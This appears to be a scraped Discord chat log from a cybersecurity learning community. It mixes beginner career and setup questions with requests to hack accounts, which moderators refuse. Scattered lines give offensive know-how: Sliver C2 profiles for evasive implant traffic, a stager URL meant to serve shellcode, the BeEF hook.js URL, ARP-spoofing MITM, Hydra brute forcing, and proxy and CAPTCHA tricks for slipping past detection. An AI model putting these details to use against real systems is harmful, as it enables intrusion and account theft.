Can anyone help me? 👋👋
I mistakenly deleted my two-step verification and now I can't access my Meta business account. Duo Security can't assist me, and neither can Meta Business, as they are two separate companies. I'm stuck in limbo and unable to get back into my account. I've been trying to recover it for almost two years and have even considered hiring a hacker for assistance. If anyone can help me regain access to my account, I would greatly appreciate it and would be willing to offer a reward. Thank you!
No, no and no
Support is your only choice, anyone offering to help for payment will scam you.
Yea i try all of that , no luck
so i’m studying for my network plus cert i have a comp tia course a book and a set of online practice tests given to me by my school what is the best way to study and obtain knowledge
hello
Ok I figured
Whats a quick way of making money im flat broke
job
@weak sable business
What’s your code?
i think i figured it out
it just randomly started to bypass
so i didnt have an invite i just clicked on from instagram
if anything happens agian , try adding rotating proxies and Some servers issue CAPTCHAs if they detect unusual activity so could also try adding captcha handling 😊 " remember stay safe and ethical "
How to check feather in rank ?
Can someone teach me how to set up your own SIEM lab! 😭😭😭🥲
https://www.youtube.com/watch?v=2XLzMb9oZBI
this video could help you
Welcome to your one-stop guide for building a Free valuable Home SIEM Lab quickly and efficiently! This tutorial will help aspiring SOC analysts get practical experience without having the job yet.
Get Ahead in Your Cybersecurity Career: Practical experience is key in the cybersecurity field. This video provides you with actionable skills and ...
Hello everyone,
New here
Any website to get a roadmap for cybersecurity?
well roadmap are all different depending on the sector you are most interested in, for example a pentester and forensic analysis will have different roadmaps. so depending on the area you want to explore more the map will be different
Never thought about it that way. Thanks
So, I want to be a forensic analyst
well for a starting point i would recommend tryhackme focusing on digital forensic rooms, from there i would setup a vm for both windows and linux and use different tools for forensic such as autopsy, volatility etc the more you research it to more you will find. hope this helps. i personally dont know any dedicated places for learning about digital forensic but maybe someone else does
Thanks a lot
I know where to start now
Hello I’m new here I needed help with something
How do I generate a link that when my staff login his email and password I can see them ?
Read #📜・rules
No unethical activities are promoted here
profiles in sliver c2, confuses me, do i really need it to make stagers ? what's the functions of profiles?
What Are Profiles in Sliver C2?
Profiles are configurations that define how your implants communicate with the Silver server.
Do You Really Need Profiles to Create Stagers?
Yes, you need a profile to create a stager in Silver because the profile specifies how your implants interact with the Silver server.
Functions of Profiles
- Stealth and Evasion: Profiles helps you imitate legit traffic patterns
- Flexible: let you switch between different communication methods
Hello house , please net strong sites apart from chrome and Google
the second question was on the way, thanks alot, clear mind now 🤭 makes sense
you dont need two listeners any more right ? a stage one and implant one, when using profiles
Browser: Firefox, Safari
Search Engine: Bing, DuckDuckGo
you are right
thank you so much
Hey yall is the dell latitude 3340 good for coding
one more question: in the custom stager , private static string url = "http://a.bc/test.woff"; this test.woff, i should be hosted and contain the shellcode .right ?
Hey can someone guide me with siem and Microsoft suits for my soc interview?
What's up guys I'm new here. So is there a way to make yourself ghostly on a security camera a guy passed my house the other day and I couldn't see by faint lines of the top half and but I could see he held something in his hand
Hello, I would like to ask, do you know how to access webs, that ends on .Taur, .Nept, dafy notes?
Working my way to become a ethical hacker what should I be learning first
How to prevent from GIF attack
💀😑
@outer geyser build a foundation in networking and OS
@outer geyser #👥・new-member-guide
For cyber security n stuff like hacking, testing etc
which os is the best?
Personally I prefer Kali Linux which is made for something like that.
ty
Fyi you can still dual boot / live boot, so you can try out a few oses
👀
Basically when you turn on pc or laptop, you can choose which OS to load.
ty
It gets a little bit complicated when you add windows to the equation (you need to have windows installed first)
windows doesn't like cooperating with other operating systems
I lowk don't know why
but it would still work w dual boot right?
yes.
I dual boot windows and arch linux
Does anyone know which ip i have to use for the hook URL while using beef?
(http:IP:3000/hook.js is the URL ı am talking about)
Where can I start learning cyber security?
hello, is it normal to have the cpu at 25-35% when playing games?
its fine to have ur cpu on 90% if ur playing games too btw
ive got a question so how comes you can simply download kali on windows store but people decided to download this or that i understand that theres is all these diffrent ways to download kali but im just wondering why people use diffrent ways
pls @ so i can see
@sterile pagoda your question doesnt really make sense
mb i mean like people use kail on virtual machines and stuff and i was just asking like why do people use vm or download it a different way
You are going to revert your machines back a lot of times. That's why most VMs have snapshots function to revert the machine back.
Also sometime you need to run 2 VMs.
When I analyze malware and I have to detonate it, I have a MITM proxy running.
I don’t know lots of ethical hacking or even cs but I was jsut asking like why bc I know you can download it on windows and on a vm and still swap between os and just wandering what’s the point in having different ways to download kali
hey does someone have a idea how i can reverse engineer a file ?
file type is file weird...
all i can say is that when you open it in notepad it's like encoded minecraft enchented table type stuff
i provided the content of the file to chatgpt and told me it's encoded ?
?
i can't in this chanel
Ohh yes sry
dms ?
Maybe
how can i get malware software for various things such as spying, taking control of a whole laptop or phone system, etc
any one know how to use Havoc Framework over internet ??
What's wrong with using Gmail? (I only care about the security part )
hey guys im new and want to start and i want to do it for my own safety but i never did som so i dont know what to do someon got tips for me how i can start and what i need?
Hey guys
I ran into a prblm
Whenever I set a spoofing attack my virtual machine just get disconnected from the router?
And every single time after the attack I have to create new VM
Why does old system gets disconnected?
Is it something with routers sec features? Or just some prblm with the ports
What are you trying to spoof exacly?
My home router and 2 connected local device
So what are you tryna achieve?
Mac/arp spoofing mitm?
Anyone, If someone hacked my Instagram account, how can I regain access and control to it?
That sounds suspicious.
Especially considering you made your account today.
I dnt play no games. Its my brother's account. And my account was not made today
Hi @everyone If you have a minute would you mind filling out this survey for my final year project at university. This survey is mainly targeted towards people who are experienced and/or have knowledge in detecting network related cyber attacks, so please only fill it out if you fit into that demographic. Thank you for your time, it really means a lot and is much appreciated😊 🫶
Same incident happened to me and I lost my account
Please if anyone has any information , it will be appreciated
Hi guys, can someone help me with decryption
im struggling to understand where its getting the extra letters from a 10 to 15 key
Seriously @fading dust ... @fast jacinth
Actually thought your other query was "legitimate" as far as it could be said RE the device type.. but asking to "regaining" access to "your" account?
Fail
Bro, what's your deal? U been coming at me since I came onboard this platform. Let's be clear - I'm a trapper. Not a scammer nor computer wiz. I'm sitting in a prison cell but have my own and carry my own. If I can acquire services for issues involving me and mines from this platform then we'll pay for it. But quit coming at me like I'm on some shady business type time. I'm not on all of that. My brother got his account hacked today and if someone can get it back for him he'll pay them - simple‼️
Because you just asked to hack in to an instagram account
Just.. call total bs
If anyone says they can hack it for you, they are going to scam you.
Good luck.
What tool are you using, also what os?
Also sorry.. but if you are in fact in jail, asking how to root a device you're fortunate enough to have access to, or asking how to hack an instagram account.. that's a perfect way to get those privileges taken away. You're away for a reason, and still are trying to do other things that are illegal or questionable? Dude, learn a lesson
He suffered the fate already. Sad..
Why people are just greedy at other peeps pockets
Because some people don't care about others, and are just out to exploit others for money
That's how those "I hack for you" scams work.. they sell hope, and exploit desperation
😥 Sad one
I guess.. but it's not anything new
That's a stain on our name as we work in the same field
Scam artists have been a thing for a while
like.. a long while
For those kind of people, any kind of desperation or desire to do something outside of law is an opportunity to pull money out of others by scamming on a promise.
Ultimately.. if your account was hacked, your only real option is to contact the services support.
Yeah agreed
I'm far from green my guy. Quite a few just told me they can regain control of the account but all wants upfront payment. When I literally offered w payment to each if get the job done then send a msg to me from my brother's account. But none agreed. Each spoke on payment. One thing I have done in prison is "educate" myself. Under my belt is a paralegal degree and psychology. One thing I learned in psychology is the way specific classes of individuals mind operate. Specifically hackers enjoy the glory of the challenge vs upfront payment.
Ok, well.. anyone that says they can help you for cost up front, they will scam you
Good stuff about education while away. Just saying.. asking the things you are while away, not the best of ideas
I've completed my Ethical Hacking course!! What should I do next?
I wouldn't expect you to get it. Your not in our position. I'm the millennium Robinhood
Great.. now I have one of the songs from the animated Robinhood film in my head, the one with Friar Tuck..
Yeah, I couldn't assume to, so sorry if I've come across as talking down to you or judging. I'll just stop speaking. I really don't think anyone has the right to judge others, as everyone's life is different, and everyone could be judged for something in their lives if we were to step up to a judge of life.
So yeah, sorry. I'll shut up
I've completed my Ethical Hacking course!! What should I do next? @halcyon flame
I don't know, check out #👥・new-member-guide.. it has some advice about where to get started, certs, learning platforms etc
Try out platforms, find what works best for you
My days of doin' wrong to ppl ended 21 yrs ago. I earn everything I have and take care of me. If I can do for ppl I do it without expectations of something in return. I learned through extensive study the rules and levels of karma. So I move in a way of righteousness. I refrain from impure thoughts as well as behaviors and treated everyone the way I want to be treated. At the end of the day, I'm surviving the way I learned to.
Who needs help tonight
Blessings everyone, I’m here to learn, network and connect with honorable members (NO NONSENSE TOLERATED)with that said. Im honored and willing.
3dac93b8cd250aa8c1a36fffc79a17a
does Does Anyone know what type of encryption that is?
nvm i am stupid its md5 missing an extra char
lol
it was 31 and i was like wait md5 is 32 and was dead confused
Yeah it was telling Hexidecimal
yeah i guess i have to brute force the last possible alpha num combination
this guy is a scammer beware of @tiny star
guess its base64
wow i was right
i know this is off topic but i actually need some help of how to ssh ubuntu server (from virtualbox) to windows terminal, i have installed openssh-client (for windows terminal) and openssh-server (for ubuntu server in vm) and i got the ip address and still i got the permissions denied,like i have been configured these stuff more than 1 hour and there's no luck, i tried the method from chatgpt yet no luck also. Anyway, i appreciate any kind of help from yall, im desperate since it is one of my project.
@silent hemlock Just a friendly reminder that discussions or actions related to unethical activities, including unauthorized hacking or similar behavior, are not permitted in this space. We appreciate your cooperation in fostering a positive and ethical community.
We’d like to remind you that OwlSec upholds the highest standards of ethics and integrity in all discussions and activities. Engaging in or condoning vigilantism, unauthorized hacking, or any form of unethical behavior, such as seeking revenge on scammers, is strictly prohibited.
it's MY ROUTER
if its yours why dont u have access?

Alright thanks tho, do you want i del the message ?
that is unethical and un authorized
Hey I'm from India then why youtube shows translate to Chinese that one comment on video
Best tutorial to install python and visual studio with Linux?
hey guyz, some one know how to craft a get/post request into an image?
you're not coding an image logger 💀
also ur whitehat
shouldnt need this info so early on
also no - not possible
it's only for knowing, if i want to be the best i need to know as much as possible.
not everyone use the capacibility and the knowledge for made bad action...
Yeah but ur a beginner, do not learn the bad actions and how to counter them, learn the basics.
If you need any help learning the basics feel free to dm me
Google it on how to do it with ur distribution
Does anyone know how to locate an ip address??
No, and this is an ethical server
We don't teach that here. If you want to learn ethical hacking/cybersec go to #👥・new-member-guide
Can you learn me hacking please 🥺
hey man was just wondering is it true you can find someones location off their number?
how ca i unlock my apple id its lock and i cant reset it urgent help plss
Can any one help with a problem I’m having with hydra on Kali Linux
yo, can anyone help me with how to setup MOK manager on kali?
i tried so hard and it's still not working
Yes
If u don't want that happening to u, learn opsec
I can teach u a bit
No
wtf is salt typhoon hsckers 💀
Search it up
are there any specific reason that they are gonna target you ??
I just don’t wanna get hacked why tf would they go after me
They hackers bruh they got free will☠️
N I’m paranoid as shit
Bro they already did it too 1 million people who knows of I’m next when being online
I just wanna be secure
We’re the Electronic Frontier Foundation, an independent non-profit working to protect online privacy for over thirty years. This is Surveillance Self-Defense: our expert guide to protecting you and your friends from online spying.
Read the BASICS to find out how online surveillance works. Dive into our TOOL GUIDES for instructions...
Aye man thanks tho some not needed advice mind yo business every now n then just keepin it real bro🫡
can someone help me with a problem on hydra?
can u explain more?
Hi, is HTB Bug bounty job role enough to get good in bug bounty? or does anyone recommend another thing
doing it rn i think its decent
good enough to get low level bugs but you might need to do more research
when i try to brute force it fails with this message: all children were disabled due too many connection errors
0 of 1 target completed, 0 valid password found
dont expect to start getting bugs that easy might take a while just keep focusing on the owasp vulns and try exploiting them
use hashcat
hey guys do someone know how to hack with a ipad ?
a gmail acct
lost me at that never done that so i have no clue
u cant even brute force a gmail account
then how can i crack one? mine btw it was hacked and im trying to get it back
i doubt even if the traffic is going through
gmail should have flagged it
thats why u have connection error
contact google best option
Hey guys it’s my first time in this. Am I in the correct place to start cybersecurity?
yessir
if u have any questions feel free to dm me
Thank you
can anyone help me
I setup a VM w/ kali linux, but some commands or installations don't go through, or if I nmap scan, nothing shows up. Is it because it's in a VM. If so, what would you recommend to set up an active directory hacking lab (ethical).
uhh more specific?
i try to put the command in from tryhackme(gobuster) and it’s saying the command is not working
I wanna make a forum for helping ppl repair stuff,but I don't have a physical server and my test bench doesn't have a hard drive,I wanna make everything on The cloud instead of physical server
and i’m confused on github
cool
find a free host
ai 🤑
I setup a VM w/ kali linux, but some commands or installations don't go through, or if I nmap scan, nothing shows up. Is it because it's in a VM. If so, what would you recommend to set up an active directory hacking lab (ethical).
Are there limits that Kali Linux has in a VMware Fusion?
I just got a message from a +63 number, they sent a phishing link and I remember seeing someone resend the link that was similar but it was a logger, Im not sure how to do it and I cant find the video. I do a lot of investigating whenever I get a first and last name or a phone number but Im new to logging
@maiden violet @civic wind Needs help with setting up a windows 11 duel boot. Is this something you could help with?
Its not me its @civic wind that needs help
a
Idk how to do that personally XD
im dualbooting mint and 10
Yea but if u don't k ow the lang at all, gpt won't help much
ik how to
Oh noice. Why not 11?
11 sux
@civic wind
Proud w10 user
10 is the goat proov me wrong bru
ok ok I understand 🤣
i use mint btw
stop with the skulls
arch is full customizationg
bomboclaat
what is the best terminal for windows?
is there a reason why my wordlist is not working in gobuster
anyone knows about massgravel windows activation thingy
Can I get help please
Sure, what's up
You guys can hack into everything right or check if something is legit or not
Sure, that's a way to put it, not everyone tho. + don't ask unethical things, it's against server rules
Well understood,though I thought maybe you can check for me my mining account if it's legit or not because the sever had so many threads to became a fake one
Wdym ur mining account?
okay, how do i start?
Can I send a link an you check it out for me
Uhh no promises but sure send it to my dms
You click search on windows and u search up powershell
okay, where i do begin to learn?
What am I exactly trying to find here again?
if u think thats a legit site its not
lol
can someone help me root my phone
